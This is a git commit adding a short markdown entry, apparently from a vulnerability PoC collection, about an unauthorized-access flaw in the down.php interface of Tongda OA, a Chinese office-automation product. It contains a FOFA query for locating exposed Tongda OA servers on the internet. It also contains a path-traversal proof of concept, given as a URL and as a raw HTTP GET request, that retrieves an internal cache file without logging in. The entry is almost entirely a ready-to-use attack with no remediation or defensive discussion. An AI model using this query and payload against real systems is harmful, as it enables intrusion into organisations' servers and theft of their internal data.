Create 通达OA down.php接口存在未授权访问漏洞.md

2023-11-29 20:56:02 +08:00 · 2023-11-29 20:56:02 +08:00 · c4ecb5b663
commit c4ecb5b663
parent 678b366ad8
1 changed files with 19 additions and 0 deletions
--- a/down.php接口存在未授权访问漏洞.md
+++ b/down.php接口存在未授权访问漏洞.md
@ -0,0 +1,19 @@
+
+## 通达OA down.php接口存在未授权访问漏洞
+
+## fofa
+```
+app="TDXK-通达OA"
+```
+
+## poc
+
+```
+http://127.0.0.1/inc/package/down.php?id=../../../cache/org
+
+GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```